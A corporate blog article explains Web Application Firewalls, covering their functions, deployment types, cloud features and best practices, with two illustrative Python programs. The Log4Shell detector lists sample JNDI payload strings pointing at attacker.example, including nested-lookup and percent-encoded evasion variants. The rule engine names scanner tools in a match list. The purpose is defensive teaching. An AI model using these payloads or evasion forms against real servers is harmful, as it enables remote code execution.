Web apps are used daily across different industries around the world – from banking solutions through collaboration tools to entertainment platforms. Their prevalence makes them a prime target for attackers who want to gain access to sensitive user information and infiltrate company databases. Fortunately, engineers have tools like Web Application Firewalls (WAFs) at their disposal to protect solutions from malicious activity. Read on to learn more about different types and functionalities of WAFs, as well as best practices for implementing and using these cybersecurity components.
What is a WAF and what does it do?
A WAF is a security control that filters and monitors HTTP(S) traffic to protect web applications against attacks at layer 7 of the Open Systems Interconnection (OSI) model. It inspects requests (and, depending on the product, responses) and blocks those that match known attack patterns or violate the configured policy, so that only traffic deemed valid reaches the application.
Implementing a WAF offers a range of security advantages. With active monitoring and customizable rules, a WAF reduces the exposure of known weaknesses in your project while they are being fixed in code; it mitigates exploitation, but it does not remove the underlying vulnerability. It keeps an application’s endpoints safer by blocking typical SQL injection and cross-site scripting (XSS) payloads that could otherwise lead to data breaches. Its control over incoming (and, in some deployments, outgoing) traffic also lets you shed unwanted requests before they reach the application, which protects performance. Finally, a WAF centralizes security policy in a set of rules, giving you a precise tool for filtering out unwanted requests and communication.
Though the specific mechanisms may differ between the solutions available on the market, in general, the main functions of a WAF include:
- traffic filtering and real-time monitoring;
When using a WAF, you get a variety of tools to filter traffic to your web app precisely. Common mechanisms include allowlisting (whitelisting) and blocklisting (blacklisting). An allowlist blocks all traffic except that which meets your criteria (for example, requests from specific IP addresses); a blocklist rejects selected kinds of traffic, while letting everything else through. A WAF also enables you to monitor traffic in (near) real time, so that you can react to incidents as soon as possible. Moreover, a WAF generates logs and reports about the traffic it has seen, which you can analyze to identify anomalies, potential issues and suspicious activity.
- protection against code injection;
A WAF helps prevent attacks that aim to interfere with application code, e.g., by injecting script fragments that target end users (XSS), abusing insecure deserialization to instantiate attacker-chosen classes, or inserting code into SQL queries (SQL injection). These attacks usually aim to run commands on the server and gain access to ever more sensitive data, which can then be destroyed or stolen. A recent, well-known example is Log4Shell (CVE-2021-44228), a zero-day vulnerability in the Log4j logging library that let attackers trigger JNDI lookups from attacker-controlled strings and remotely execute their own Java code on servers and devices, affecting organizations such as Google and Microsoft. Systems already behind a WAF could get an immediate stopgap by adding ingress rules that rejected requests carrying the JNDI lookup pattern; in practice, attackers quickly obfuscated the payload with nested lookups and encoding, so those signatures had to be refined repeatedly, and patching Log4j remained the real fix.
- intrusion detection and prevention;
By implementing a WAF, you can protect your web application from bots and scanners that probe it to identify potential vulnerabilities. Such tools build a detailed inventory of an application’s resources and services, which helps attackers prepare a full-blown attack. A WAF can alert you to this reconnaissance or report the increased traffic, so that you can block the bots or take other action to protect your app.
- protection of back-end systems;
The filtering mechanisms provided by a WAF ensure that only valid traffic reaches your back-end systems. They help mitigate application-layer (layer 7) denial-of-service attacks, such as HTTP floods, by dropping unnecessary or malicious requests before they overload the application; large volumetric DDoS attacks are better handled by a dedicated DDoS protection service placed in front of the WAF. As a result, your web application is not only safer, but it also performs better.
- regulatory compliance.
Data security is a growing concern for consumers, and it is also an area companies must address to meet the regulations of their industry. Installing a WAF can help your web software meet security requirements in frameworks such as HIPAA, GDPR, SOC 2 and PCI DSS (which explicitly names a WAF as one accepted way of protecting public-facing web applications).
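As an added illustration of the Log4Shell point in the code-injection item above (this is example code written for this article, not a rule from any WAF product), the following Python compares a literal `${jndi:` signature, which is how the first emergency rules were written, with a check that first percent-decodes the value and statically folds Log4j’s nested lookups (`${lower:...}`, `${upper:...}` and the `${...:-default}` form) before looking for a JNDI lookup. The sample header values are constructed for the example, and the lookup folding is a simplified approximation of Log4j’s real substitution grammar, so it shows why signature rules had to be refined rather than serving as a production rule.

```python
import re
from urllib.parse import unquote

# A literal signature, as the first emergency blocklist rules were written.
NAIVE_SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# An innermost ${...} lookup: one with no further braces inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def naive_match(value: str) -> bool:
    """What a literal '${jndi:' signature sees in the raw value."""
    return NAIVE_SIGNATURE.search(value) is not None


def _fold(match: re.Match) -> str:
    """Statically fold one innermost lookup the way an attacker expects Log4j
    to evaluate it. No lookup is ever performed; this is string rewriting only
    (simplified: the real substitution grammar has more cases)."""
    expr = match.group(1)
    # ${anything:-default} evaluates to the default value.
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, sep, rest = expr.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    # Any other lookup (jndi, env, sys, date, ...): keep its text but drop the
    # braces so the outer loop terminates and the final check can see it.
    return "<" + expr + ">"


def normalize_lookups(value: str, max_passes: int = 32) -> str:
    """Percent-decode (bounded, to handle double encoding) and fold nested
    lookups from the inside out until nothing changes."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    for _ in range(max_passes):
        folded = INNERMOST_LOOKUP.sub(_fold, value)
        if folded == value:
            break
        value = folded
    return value


def is_jndi_lookup(value: str) -> bool:
    """Detect a JNDI lookup after normalization, case-insensitively."""
    return "jndi:" in normalize_lookups(value).lower()


# Constructed header values (not captured traffic) for the example.
SAMPLE_VALUES = [
    ("benign", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("plain", "${jndi:ldap://attacker.example/a}"),
    ("nested-lower", "${${lower:j}ndi:ldap://attacker.example/a}"),
    ("default-value", "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"),
    ("url-encoded", "%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D"),
]


def evaluate(samples=SAMPLE_VALUES) -> dict:
    """Map each sample name to (naive_signature_hit, normalized_hit)."""
    return {name: (naive_match(v), is_jndi_lookup(v)) for name, v in samples}


if __name__ == "__main__":
    for name, (naive, normalized) in evaluate().items():
        print(f"{name:14} naive={naive!s:5} normalized={normalized}")
```

Only the plain payload trips the literal signature; the nested, default-value and percent-encoded variants get through it and are caught only after normalization. This is also why such a rule belongs in a count-only mode first: folding is cheap, but any `${...}` syntax in a request is rare enough in legitimate traffic that it deserves a look before blocking.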
Types of Web Application Firewalls
There are three main deployment types of WAF, plus a behavior-based variant of the cloud type. All of them serve the basic functions mentioned earlier; however, companies may choose different WAF solutions to meet their specific product needs, budget limits and regulatory requirements.
1. Network-based WAFs
Examples: ModSecurity (for Apache httpd and Nginx), HAProxy Enterprise WAF. Snort, often listed alongside them, is a network IDS/IPS rather than a WAF.
A network-based (often called software-based) WAF runs as a module on the web server or as a reverse proxy in front of it, between the browser and the application. It analyzes incoming and outgoing traffic and filters requests that match attack signatures or violate the configured rules. This type of WAF is relatively cost-effective and flexible in terms of the servers it can be deployed for, but because it shares CPU with the application, its filtering and monitoring can be slower than with dedicated hardware.
2. Hardware-based WAFs
Examples: F5, Fortinet, Imperva SecureSphere, Barracuda Web Application Firewall.
A hardware-based WAF is deployed on a dedicated physical device and installed within a local network. All traffic is directed to this piece of hardware, which contains all the necessary filtering and monitoring components. This WAF type offers significantly higher performance and better speed, however, it can be more expensive than other WAFs to purchase and maintain.
3. Cloud-based WAFs
Examples: Azure Web Application Firewall (Microsoft Azure), Google Cloud Armor (Google Cloud Platform, GCP) and AWS WAF (Amazon Web Services).
This type of WAF is a managed software component of a cloud provider’s infrastructure, offered as a service that sits in front of load balancers, CDNs or API gateways. It performs well, scales easily and supports many integrations, which helps improve the security of projects such as those based on Kubernetes.
4. Behavior-based WAFs
Examples: ThreatX Protection, Fastly Next-Gen WAF.
A subtype of cloud WAFs, behavior-based WAFs apply machine learning (ML) to complement rule-based filtering. By learning a baseline of normal traffic and flagging deviations from it, they can surface anomalies, some attempts to exploit zero-day vulnerabilities and attempts to bypass the WAF that no explicit rule describes. Because they keep refining their models on real traffic, the number of false positives tends to fall over time, and some products turn confirmed patterns into new rules automatically. The usual caveat applies: the baseline reflects whatever traffic the model was trained on, so generated rules still need review before they are allowed to block.
Typical functionalities of leading cloud-based WAFs
The WAFs available on the major platforms offer similar protective capabilities, and the one you choose will usually be dictated by the platform on which you deploy your applications. The key takeaway is therefore to be familiar with the mechanisms WAFs offer and to actually switch them on in your projects. This section highlights functionalities you can find in the cloud-based WAF solutions of Microsoft Azure, GCP and AWS.
Cloud-based WAFs enable you to:
- filter traffic (based on different conditions e.g., countries, regions, IP addresses, regex sets, other custom metrics) and implement web access control lists (web ACLs, in AWS WAF terminology),
- apply the OWASP Core Rule Set (CRS),
- block XSS and SQL injection attacks,
- protect your app from HTTP request smuggling, HTTP response splitting and remote file inclusion,
- detect HTTP protocol anomalies and malformed parameters that violate the HTTP/1.1 specification (originally RFC 2616, since superseded by RFC 9110 to 9112),
- keep your app safe from bots, crawlers and scanners (such as Shodan, ZoomEye and Censys),
- analyze the contents of an app’s body to prevent XML external entity (XXE) injection attacks,
- stop attackers from using compromised accounts to cause further breaches; for example, AWS WAF Fraud Control includes account takeover prevention (ATP), which compares submitted login credentials against a database of known stolen credentials, and account creation fraud prevention (ACFP),
- analyze traffic patterns and automatically generate new filtering rules (e.g., Google Cloud Armor Adaptive Protection),
- detect typical mistakes in app configurations e.g., in Apache and Internet Information Services (IIS) apps,
- identify and limit vulnerabilities in Log4j,
- complement the database protection offered by the platform’s wider security services (e.g., Microsoft Defender for Cloud).
Best practices for implementing and using a WAF
Understanding how a WAF works and what advantages it offers is the first step to building safe apps. To get the most out of this measure, it’s also important to set up and configure it in an optimal way, then maintain it to head off new threats.
For example, when rolling out a WAF or a new rule, start in a preview or detection-only mode (the COUNT action in AWS WAF, Detection mode in Azure WAF, preview mode in Cloud Armor). Matches are logged but not blocked, so you can spot false positives and confirm that the WAF behaves as expected before enforcement is switched on. Another recommendation is to create dedicated rules for the kinds of traffic a given application handles (for example, separate rules for headers, query strings and body), so that you can account for attacks characteristic of those elements. It is also a good idea to enable the managed rule groups that target specific vulnerability classes (such as XSS and SQL injection).
Rate-based rules are another good choice. By tracking the number of requests from each client IP address over a time window and blocking clients that exceed a threshold, you can cut off excessive traffic. You should also enable detailed request logs: in case of an incident or suspicious activity, these records can be analyzed to reconstruct what happened and identify vulnerabilities in the app. To manage all these rulesets, Infrastructure as Code (IaC) tools like Terraform are highly recommended; they make it easier to create, review, roll back and transfer rules between environments. To verify that rules actually block what they should, scan the application through the WAF with an external scanner (e.g., Qualys or Tenable) and compare the results with a scan that bypasses it. Additionally, activate the dedicated DDoS protection mechanism of your platform: AWS Shield, Azure DDoS Protection (typically in front of Azure Front Door) or Google Cloud Armor.
Most WAFs terminate TLS so that they can inspect plaintext requests. To keep data private between the WAF and your servers, re-encrypt the inspected traffic by using Transport Layer Security (TLS) for the backend (origin) connection as well. Backend TLS costs CPU and certificate management effort, but it ensures the data stays encrypted end to end, which is particularly important for sensitive information. Just as important, configure the origin to accept connections only from the WAF (for example, through network ACLs or a secret header the WAF adds), so that an attacker who discovers the origin’s address cannot simply bypass the WAF.
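To make the filtering, rate-limiting, preview-mode and logging practices above concrete (and the allowlist/blocklist and flood-protection points from the first section), here is a small rule engine written for this article in Python. It is not code from AWS WAF, Azure WAF or Cloud Armor, but it mimics their ordered-evaluation semantics: ALLOW and BLOCK terminate evaluation, COUNT only records a match and lets evaluation continue. The CIDR ranges, rate limit, user-agent strings and traffic sample are all constructed for the example.

```python
import ipaddress
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class Request:
    ts: float          # epoch seconds
    src_ip: str
    path: str
    user_agent: str


@dataclass
class Rule:
    name: str
    predicate: Callable[[Request], bool]
    action: str        # "ALLOW" and "BLOCK" terminate evaluation; "COUNT" only logs


class RateTracker:
    """Sliding-window request counter per source IP (the rate-based rule)."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self._hits: Dict[str, deque] = defaultdict(deque)

    def over_limit(self, ip: str, ts: float) -> bool:
        q = self._hits[ip]
        while q and ts - q[0] >= self.window:   # drop hits outside the window
            q.popleft()
        q.append(ts)
        return len(q) > self.limit


def cidr_rule(name: str, cidrs: List[str], action: str) -> Rule:
    """Allowlist (ALLOW) or blocklist (BLOCK) a set of CIDR ranges."""
    nets = [ipaddress.ip_network(c) for c in cidrs]
    return Rule(name, lambda r: any(ipaddress.ip_address(r.src_ip) in n for n in nets), action)


class Waf:
    """Ordered rule evaluation with a default action and a request log."""

    def __init__(self, rules: List[Rule], default_action: str = "ALLOW"):
        self.rules, self.default_action = rules, default_action
        self.log: List[dict] = []

    def evaluate(self, req: Request) -> str:
        action, terminating_rule, counted = self.default_action, None, []
        for rule in self.rules:
            if not rule.predicate(req):
                continue
            if rule.action == "COUNT":       # preview mode: record, keep going
                counted.append(rule.name)
                continue
            action, terminating_rule = rule.action, rule.name
            break
        self.log.append({"ts": req.ts, "src_ip": req.src_ip, "path": req.path,
                         "action": action, "rule": terminating_rule, "counted": counted})
        return action


def build_policy() -> Waf:
    """Constructed policy for the example; ranges and limits are illustrative."""
    tracker = RateTracker(limit=5, window=10.0)
    return Waf([
        cidr_rule("office-allowlist", ["10.0.0.0/8"], "ALLOW"),
        cidr_rule("known-bad-ranges", ["203.0.113.0/24"], "BLOCK"),
        Rule("rate-limit-5-per-10s", lambda r: tracker.over_limit(r.src_ip, r.ts), "BLOCK"),
        # New rule rolled out in COUNT mode first, to check for false positives.
        Rule("scanner-user-agent",
             lambda r: any(s in r.user_agent.lower() for s in ("sqlmap", "nikto")), "COUNT"),
    ])


def sample_traffic() -> List[Request]:
    """Constructed requests (not captured traffic): a trusted client, a
    blocklisted one, a scanner, and an 8-request burst from one client."""
    reqs = [Request(1.0, "10.0.0.5", "/admin", "Mozilla/5.0"),
            Request(1.5, "203.0.113.7", "/login", "Mozilla/5.0"),
            Request(2.0, "192.0.2.44", "/search?q=1", "sqlmap/1.7")]
    reqs += [Request(3.0 + i * 0.2, "198.51.100.9", "/api/items", "curl/8.0") for i in range(8)]
    return reqs


def run(waf: Optional[Waf] = None, traffic: Optional[List[Request]] = None) -> List[dict]:
    waf = waf or build_policy()
    for req in traffic or sample_traffic():
        waf.evaluate(req)
    return waf.log


def summarize(log: List[dict]) -> Dict[str, int]:
    """Count final actions, terminating rules and COUNT-mode matches."""
    summary: Dict[str, int] = defaultdict(int)
    for entry in log:
        summary[entry["action"]] += 1
        if entry["rule"]:
            summary["rule:" + entry["rule"]] += 1
        for name in entry["counted"]:
            summary["counted:" + name] += 1
    return dict(summary)


if __name__ == "__main__":
    log = run()
    for e in log:
        print(f'{e["ts"]:5.1f} {e["src_ip"]:14} {e["action"]:5} rule={e["rule"]} counted={e["counted"]}')
    print(summarize(log))
```

Two things worth noticing in the output: the allowlisted office client terminates evaluation before the rate rule, so rule order decides who is exempt from rate limiting, and the scanner request is logged as allowed with a counted match, which is exactly the signal you review before promoting that rule from COUNT to BLOCK. The burst from the last client is admitted up to the limit and then blocked for the rest of the window.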
Finally, regularly review and update WAF rules. Some settings may need to be changed or added to accommodate new features. Moreover, attackers are constantly refining their methods and coming up with new techniques – that’s why your security mechanisms also need to be up to date at all times.
Cybersecurity is essential to high-quality cloud software development
WAF components are excellent tools for protecting web solutions from various kinds of attacks that can result in sensitive data leaks, reputational damage and loss of customer trust. However, just like with similar mechanisms, you shouldn’t rely only on a few security tools. A WAF works best if it’s an element of a layered cybersecurity solution when building cloud-based apps, from a safe architecture to long-term best practices.
A cross-functional development team can ensure that your solutions are built with strong safeguards, a satisfying user experience and high performance in mind from the very beginning. Organizations often team up with software engineering partners like Software Mind to speed up software delivery and drive innovation while enhancing security.
About the author: Jan Jurek
Senior Software Architect
A Senior Software Architect and Team Manager with almost 15 years’ experience, Jan has developed and managed projects using a wide array of tools and technologies, especially Java. Passionate about enhancing products and services for his clients, Jan leverages his engineering background and security expertise to ensure safe and swift software delivery. When not exploring the exciting possibilities of Kubernetes, AWS and Web Application Security, he can be found giving lectures to students at various Polish universities.
About the author: Mateusz Żelazko
Principal Software Engineer
A Principal Software Engineer, Mateusz has over 10 years’ experience in designing and implementing Java and microservice-based systems for businesses in the telecommunications and manufacturing industries. As an active contributor to the Security Guild, his professional interests revolve around the security of web applications, system optimizations and finding solutions to performance issues.
About the author: Tomasz Kuc
Senior System Engineer
A Senior System Engineer with many years' experience in IT, Tomasz has implemented a range of systems and worked on diverse IT projects, in recent years mainly for mobile operators. He has a keen interest in security, especially as regards analyzing malware and researching different kinds of cyber risks.